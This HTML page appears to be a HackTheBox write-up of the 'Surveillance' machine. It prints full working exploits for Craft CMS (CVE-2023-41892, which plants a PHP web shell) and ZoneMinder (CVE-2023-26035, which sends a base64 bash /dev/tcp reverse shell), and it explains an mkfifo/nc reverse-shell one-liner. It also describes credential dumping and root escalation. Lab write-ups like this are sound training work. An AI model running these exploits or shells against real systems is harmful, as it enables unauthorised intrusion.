<!DOCTYPE html>
<html class="direction--ltr"lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Surveillance-Linux-Medium | Pwn3d777</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="Surveillance-Linux-Medium" />
<meta name="author" content="GitHub User" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Surveillance" />
<meta property="og:description" content="Surveillance" />
<link rel="canonical" href="https://your-site-url/writeups/2025/07/10/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf.html" />
<meta property="og:url" content="https://your-site-url/writeups/2025/07/10/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf.html" />
<meta property="og:site_name" content="Pwn3d777" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-07-10T16:05:57+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Surveillance-Linux-Medium" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"GitHub User"},"dateModified":"2025-07-10T16:05:57+00:00","datePublished":"2025-07-10T16:05:57+00:00","description":"Surveillance","headline":"Surveillance-Linux-Medium","mainEntityOfPage":{"@type":"WebPage","@id":"https://your-site-url/writeups/2025/07/10/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf.html"},"url":"https://your-site-url/writeups/2025/07/10/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" />
  <link rel="stylesheet" href="/assets/css/magnific-popup.css"><link type="application/atom+xml" rel="alternate" href="https://your-site-url/feed.xml" title="Pwn3d777" /><script src="https://code.jquery.com/jquery-3.2.0.min.js"></script> 
  <script src="/assets/js/jquery.magnific-popup.js"></script>
</head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pwn3d777<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        
        
        <a class="color-cyan-hover" href="https://twitter.com/bitbrain_"><i class="fab fa-twitter-square"></i></a>
        
        
        
        <a class="color-red-hover" href="https://bitbrain.itch.io"><i class="fab fa-itch-io"></i></a>
        
        
        
        <a class="color-purple-hover" href="https://github.com/bitbrain"><i class="fab fa-github-square"></i></a>
        
        
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
<div class="post">
  <h1 class="post-title">Surveillance-Linux-Medium</h1>
  
  <div class="post-date">
    Published on 10 Jul 2025
    
  </div>
  
  <h1 id="surveillance">Surveillance</h1>

<p>HackTheBox: Medium</p>

<aside>
💡 Surveillance is a medium linux machine with a monitor service

</aside>

<h2 id="1-enumeration">1: Enumeration</h2>
<p><br /><br /></p>
<ul>
  <li>Check the active connection
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled.png" alt="Untitled" />
<br /><br /></li>
  <li>Scanning ports
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_1.png" alt="Untitled" />
<br /><br />
We can see there’s a web services running in 80 port and ssh service in 22 
<br /><br />
    <h2 id="2-looking-around">2: Looking around</h2>
    <p><br /><br /></p>
  </li>
  <li>There is a web service powered by Craft CMS in the main page. CVE-2023-41892 is a vulnerability for this technology, we need to execute a POC for this vulnerability, but after a lot of time fixing parameters made by machine configurations we find the right version of the exploit.
<br /><br /></li>
</ul>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">"User-Agent"</span><span class="p">:</span> <span class="s">"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36"</span>
<span class="p">}</span>

<span class="k">def</span> <span class="nf">writePayloadToTempFile</span><span class="p">(</span><span class="n">documentRoot</span><span class="p">):</span>
    <span class="n">data</span> <span class="o">=</span> <span class="p">{</span>
        <span class="s">"action"</span><span class="p">:</span> <span class="s">"conditions/render"</span><span class="p">,</span>
        <span class="s">"configObject[class]"</span><span class="p">:</span> <span class="s">"craft\elements\conditions\ElementCondition"</span><span class="p">,</span>
        <span class="s">"config"</span><span class="p">:</span> <span class="s">'{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:"}}}'</span>
    <span class="p">}</span>

    <span class="n">files</span> <span class="o">=</span> <span class="p">{</span>
        <span class="s">"image1"</span><span class="p">:</span> <span class="p">(</span><span class="s">"pwn1.msl"</span><span class="p">,</span> <span class="s">"""&lt;?xml version="1.0" encoding="UTF-8"?&gt;
        &lt;image&gt;
        &lt;read filename="caption:&amp;lt;?php @system(@$_REQUEST['cmd']); ?&amp;gt;"/&gt;
        &lt;write filename="info:DOCUMENTROOT/cpresources/shell.php"&gt;
        &lt;/image&gt;"""</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"DOCUMENTROOT"</span><span class="p">,</span> <span class="n">documentRoot</span><span class="p">),</span> <span class="s">"text/plain"</span><span class="p">)</span>
    <span class="p">}</span>

    <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">,</span> <span class="n">files</span><span class="o">=</span><span class="n">files</span><span class="p">,</span> <span class="n">proxies</span><span class="o">=</span><span class="p">{</span><span class="s">"http"</span><span class="p">:</span> <span class="s">"http://127.0.0.1:8080"</span><span class="p">})</span>

<span class="k">def</span> <span class="nf">getTmpUploadDirAndDocumentRoot</span><span class="p">():</span>
    <span class="n">data</span> <span class="o">=</span> <span class="p">{</span>
        <span class="s">"action"</span><span class="p">:</span> <span class="s">"conditions/render"</span><span class="p">,</span>
        <span class="s">"configObject[class]"</span><span class="p">:</span> <span class="s">"craft\elements\conditions\ElementCondition"</span><span class="p">,</span>
        <span class="s">"config"</span><span class="p">:</span> <span class="sa">r</span><span class="s">'{"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'</span>
    <span class="p">}</span>

    <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span>

    <span class="n">pattern1</span> <span class="o">=</span> <span class="sa">r</span><span class="s">'&lt;tr&gt;&lt;td class="e"&gt;upload_tmp_dir&lt;\/td&gt;&lt;td class="v"&gt;(.*?)&lt;\/td&gt;&lt;td class="v"&gt;(.*?)&lt;\/td&gt;&lt;\/tr&gt;'</span>
    <span class="n">pattern2</span> <span class="o">=</span> <span class="sa">r</span><span class="s">'&lt;tr&gt;&lt;td class="e"&gt;\$_SERVER\[\'DOCUMENT_ROOT\'\]&lt;\/td&gt;&lt;td class="v"&gt;([^&lt;]+)&lt;\/td&gt;&lt;\/tr&gt;'</span>

    <span class="n">match1</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="n">pattern1</span><span class="p">,</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span><span class="p">,</span> <span class="n">re</span><span class="p">.</span><span class="n">DOTALL</span><span class="p">)</span>
    <span class="n">match2</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="n">pattern2</span><span class="p">,</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span><span class="p">,</span> <span class="n">re</span><span class="p">.</span><span class="n">DOTALL</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">match1</span><span class="p">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">),</span> <span class="n">match2</span><span class="p">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span>
    <span class="k">return</span> <span class="n">match1</span><span class="p">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">),</span> <span class="n">match2</span><span class="p">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">trigerImagick</span><span class="p">(</span><span class="n">tmpDir</span><span class="p">):</span>
    <span class="n">data</span> <span class="o">=</span> <span class="p">{</span>
        <span class="s">"action"</span><span class="p">:</span> <span class="s">"conditions/render"</span><span class="p">,</span>
        <span class="s">"configObject[class]"</span><span class="p">:</span> <span class="s">"craft\elements\conditions\ElementCondition"</span><span class="p">,</span>
        <span class="s">"config"</span><span class="p">:</span> <span class="s">'{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:'</span> <span class="o">+</span> <span class="n">tmpDir</span> <span class="o">+</span> <span class="sa">r</span><span class="s">'/php*"}}}'</span>
    <span class="p">}</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">shell</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">base_url</span> <span class="o">+</span> <span class="s">"/cpresources/shell.php"</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="p">{</span><span class="s">"cmd"</span><span class="p">:</span> <span class="n">cmd</span><span class="p">})</span>
    <span class="n">match</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s">'caption:(.*?)CAPTION'</span><span class="p">,</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span><span class="p">,</span> <span class="n">re</span><span class="p">.</span><span class="n">DOTALL</span><span class="p">)</span>

    <span class="k">if</span> <span class="n">match</span><span class="p">:</span>
        <span class="n">extracted_text</span> <span class="o">=</span> <span class="n">match</span><span class="p">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">).</span><span class="n">strip</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="n">extracted_text</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>
    <span class="k">return</span> <span class="n">extracted_text</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">2</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"Usage: python CVE-2023-41892.py &lt;url&gt;"</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">()</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">url</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="n">base_url</span> <span class="o">=</span> <span class="s">'http://surveillance.htb'</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Get temporary folder and document root ..."</span><span class="p">)</span>
        <span class="n">upload_tmp_dir</span><span class="p">,</span> <span class="n">documentRoot</span> <span class="o">=</span> <span class="n">getTmpUploadDirAndDocumentRoot</span><span class="p">()</span>
        <span class="n">tmpDir</span> <span class="o">=</span> <span class="s">"/tmp"</span> <span class="k">if</span> <span class="s">"no value"</span> <span class="ow">in</span> <span class="n">upload_tmp_dir</span> <span class="k">else</span> <span class="n">upload_tmp_dir</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Write payload to temporary file ..."</span><span class="p">)</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">writePayloadToTempFile</span><span class="p">(</span><span class="n">documentRoot</span><span class="p">)</span>
        <span class="k">except</span> <span class="n">requests</span><span class="p">.</span><span class="n">exceptions</span><span class="p">.</span><span class="nb">ConnectionError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Crash the php process and write temp file successfully"</span><span class="p">)</span>

        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Trigger imagick to write shell ..."</span><span class="p">)</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">trigerImagick</span><span class="p">(</span><span class="n">tmpDir</span><span class="p">)</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>

        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Done, enjoy the shell"</span><span class="p">)</span>
        <span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
            <span class="n">cmd</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s">"$ "</span><span class="p">)</span>
            <span class="n">shell</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
</code></pre></div></div>

<p><br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_2.png" alt="Untitled" />
<br /><br /></p>
<ul>
  <li>Make a little bit more stable the bash
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_3.png" alt="Untitled" />
<br /><br />
This is pretty much it:
<br /><br />
    <ol>
      <li><strong><code class="language-plaintext highlighter-rouge">**rm /tmp/f**</code>:</strong>
<br /><br />
— Deletes any existing file named <code class="language-plaintext highlighter-rouge">/tmp/f</code> to ensure a fresh start.
<br /><br /></li>
      <li><strong><code class="language-plaintext highlighter-rouge">**mkfifo /tmp/f**</code>:</strong>
<br /><br />
— Creates a named pipe (FIFO) named <code class="language-plaintext highlighter-rouge">/tmp/f</code>. A named pipe is a special type of file that allows processes to communicate.
<br /><br /></li>
      <li><strong><code class="language-plaintext highlighter-rouge">**cat /tmp/f | /bin/bash -i 2&gt;&amp;1**</code>:</strong>
<br /><br />
— Reads from the named pipe (<code class="language-plaintext highlighter-rouge">/tmp/f</code>) and pipes the content to <code class="language-plaintext highlighter-rouge">/bin/bash</code> with the <code class="language-plaintext highlighter-rouge">-i</code> option for an interactive shell.
<br /><br />
— The <code class="language-plaintext highlighter-rouge">2&gt;&amp;1</code> redirects standard error (file descriptor 2) to standard output (file descriptor 1), ensuring that error messages are also sent through the pipeline.
<br /><br /></li>
      <li><strong><code class="language-plaintext highlighter-rouge">**nc 10.10.x.x 4444 &gt;/tmp/f**</code>:</strong>
<br /><br />
— Initiates a Netcat (<code class="language-plaintext highlighter-rouge">nc</code>) connection to the IP address <code class="language-plaintext highlighter-rouge">10.10.x.x</code> on port <code class="language-plaintext highlighter-rouge">4444</code>.
<br /><br />
— The standard output of the entire pipeline (which includes the output of the Bash shell) is redirected to the named pipe <code class="language-plaintext highlighter-rouge">/tmp/f</code>. This completes the loop, sending the shell output back into the named pipe, creating a bidirectional communication channel
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_4.png" alt="Untitled" />
<br /><br />
        <h2 id="3-user-flag">3: User flag</h2>
        <p><br /><br />
Got db creds 
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_5.png" alt="Untitled" />
<br /><br />
Just hash with
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_6.png" alt="Untitled" />
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_7.png" alt="Untitled" />
<br /><br /></p>
        <h2 id="4-priv-esc">4: Priv esc</h2>
        <p><br /><br /></p>
      </li>
    </ol>
  </li>
  <li>We check active connections with
<br /><br />
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>netstat <span class="nt">-natu</span> <span class="nt">-nltp</span>
</code></pre></div>    </div>
    <p><br /><br />
There is something running locally
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_8.png" alt="Untitled" />
<br /><br />
We go to /etc/nignx/sites-enable and cat zoneminder.conf
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_9.png" alt="Untitled" />
<br /><br />
There is a zoneminder service running that is a monitored technology lets port fowarding with ssh
<br /><br /></p>
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh <span class="nt">-L</span> port:ip:port
</code></pre></div>    </div>
    <p><br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_10.png" alt="Untitled" />
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_11.png" alt="Untitled" />
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_12.png" alt="Untitled" />
<br /><br />
Info about zoneminder versions, lets look for some vulnerability
<br /><br />
(CVE-202326035) POC 
<br /><br /></p>
    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">BeautifulSoup</span>
<span class="kn">import</span> <span class="nn">argparse</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="c1"># CVE-2023-26035 - Unauthenticated RCE in ZoneMinder Snapshots
# Author : Ravindu Wickramasinghe | rvz (@RVIZX9)
</span><span class="k">class</span> <span class="nc">ZoneMinderExploit</span><span class="p">:</span>
  <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">target_uri</span><span class="p">):</span>
      <span class="bp">self</span><span class="p">.</span><span class="n">target_uri</span> <span class="o">=</span> <span class="n">target_uri</span>
      <span class="bp">self</span><span class="p">.</span><span class="n">csrf_magic</span> <span class="o">=</span> <span class="bp">None</span>
  <span class="k">def</span> <span class="nf">fetch_csrf_token</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
      <span class="k">print</span><span class="p">(</span><span class="s">"[&gt;] fetching csrt token"</span><span class="p">)</span>
      <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">target_uri</span><span class="p">)</span>
      <span class="bp">self</span><span class="p">.</span><span class="n">csrf_magic</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">get_csrf_magic</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
      <span class="k">if</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span> <span class="ow">and</span> <span class="n">re</span><span class="p">.</span><span class="n">match</span><span class="p">(</span><span class="sa">r</span><span class="s">'^key:[a-f0-9]{40},\d+'</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">csrf_magic</span><span class="p">):</span>
          <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"[&gt;] recieved the token: </span><span class="si">{</span><span class="bp">self</span><span class="p">.</span><span class="n">csrf_magic</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
          <span class="k">return</span> <span class="bp">True</span>
      <span class="k">print</span><span class="p">(</span><span class="s">"[!] unable to fetch or parse token."</span><span class="p">)</span>
      <span class="k">return</span> <span class="bp">False</span>
  <span class="k">def</span> <span class="nf">get_csrf_magic</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">response</span><span class="p">):</span>
      <span class="k">return</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">response</span><span class="p">.</span><span class="n">text</span><span class="p">,</span> <span class="s">'html.parser'</span><span class="p">).</span><span class="n">find</span><span class="p">(</span><span class="s">'input'</span><span class="p">,</span> <span class="p">{</span><span class="s">'name'</span><span class="p">:</span> <span class="s">'__csrf_magic'</span><span class="p">}).</span><span class="n">get</span><span class="p">(</span><span class="s">'value'</span><span class="p">,</span> <span class="bp">None</span><span class="p">)</span>
  <span class="k">def</span> <span class="nf">execute_command</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
      <span class="k">print</span><span class="p">(</span><span class="s">"[&gt;] sending payload.."</span><span class="p">)</span>
      <span class="n">data</span> <span class="o">=</span> <span class="p">{</span><span class="s">'view'</span><span class="p">:</span> <span class="s">'snapshot'</span><span class="p">,</span> <span class="s">'action'</span><span class="p">:</span> <span class="s">'create'</span><span class="p">,</span> <span class="s">'monitor_ids[0][Id]'</span><span class="p">:</span> <span class="sa">f</span><span class="s">';</span><span class="si">{</span><span class="n">cmd</span><span class="si">}</span><span class="s">'</span><span class="p">,</span> <span class="s">'__csrf_magic'</span><span class="p">:</span> <span class="bp">self</span><span class="p">.</span><span class="n">csrf_magic</span><span class="p">}</span>
      <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="sa">f</span><span class="s">"</span><span class="si">{</span><span class="bp">self</span><span class="p">.</span><span class="n">target_uri</span><span class="si">}</span><span class="s">/index.php"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span>
      <span class="k">print</span><span class="p">(</span><span class="s">"[&gt;] payload sent"</span> <span class="k">if</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span> <span class="k">else</span> <span class="s">"[!] failed to send payload"</span><span class="p">)</span>
  <span class="k">def</span> <span class="nf">exploit</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">payload</span><span class="p">):</span>
      <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">fetch_csrf_token</span><span class="p">():</span>
          <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"[&gt;] executing..."</span><span class="p">)</span>
          <span class="bp">self</span><span class="p">.</span><span class="n">execute_command</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
  <span class="n">parser</span> <span class="o">=</span> <span class="n">argparse</span><span class="p">.</span><span class="n">ArgumentParser</span><span class="p">()</span>
  <span class="n">parser</span><span class="p">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s">'-t'</span><span class="p">,</span> <span class="s">'--target-url'</span><span class="p">,</span> <span class="n">required</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">'target url endpoint'</span><span class="p">)</span>
  <span class="n">parser</span><span class="p">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s">'-ip'</span><span class="p">,</span> <span class="s">'--local-ip'</span><span class="p">,</span> <span class="n">required</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">'local ip'</span><span class="p">)</span>
  <span class="n">parser</span><span class="p">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s">'-p'</span><span class="p">,</span> <span class="s">'--port'</span><span class="p">,</span> <span class="n">required</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">'port'</span><span class="p">)</span>
  <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
  <span class="c1"># generating the payload
</span>  <span class="n">ps1</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"bash -i &gt;&amp; /dev/tcp/</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">local_ip</span><span class="si">}</span><span class="s">/</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">port</span><span class="si">}</span><span class="s"> 0&gt;&amp;1"</span>  
  <span class="n">ps2</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64encode</span><span class="p">(</span><span class="n">ps1</span><span class="p">.</span><span class="n">encode</span><span class="p">()).</span><span class="n">decode</span><span class="p">()</span>
  <span class="n">payload</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"echo </span><span class="si">{</span><span class="n">ps2</span><span class="si">}</span><span class="s"> | base64 -d | /bin/bash"</span>
  <span class="n">ZoneMinderExploit</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">target_url</span><span class="p">).</span><span class="n">exploit</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</code></pre></div>    </div>
    <p><br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_13.png" alt="Untitled" />
<br /><br />
Access as zoneminder
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_14.png" alt="Untitled" />
<br /><br />
check for premises
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_15.png" alt="Untitled" />
<br /><br />
We can update db and change others file in zm
<br /><br />
But we are no going to update anything we are going to pass a revshell in user update
<br /><br /></p>
    <ol>
      <li>We can stabilize the shell using import ptty but it is not necessary, we create the revshell and pass it trought a python server
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_16.png" alt="Untitled" />
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_17.png" alt="Untitled" />
<br /><br />
chmod 700 or chmod  +x  for permisses
<br /><br />
We need to be listening at the port specify 
<br /><br />
And as a final step:
<br /><br />
<img src="/assets/images/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf_Untitled_18.png" alt="Untitled" />
<br /><br />
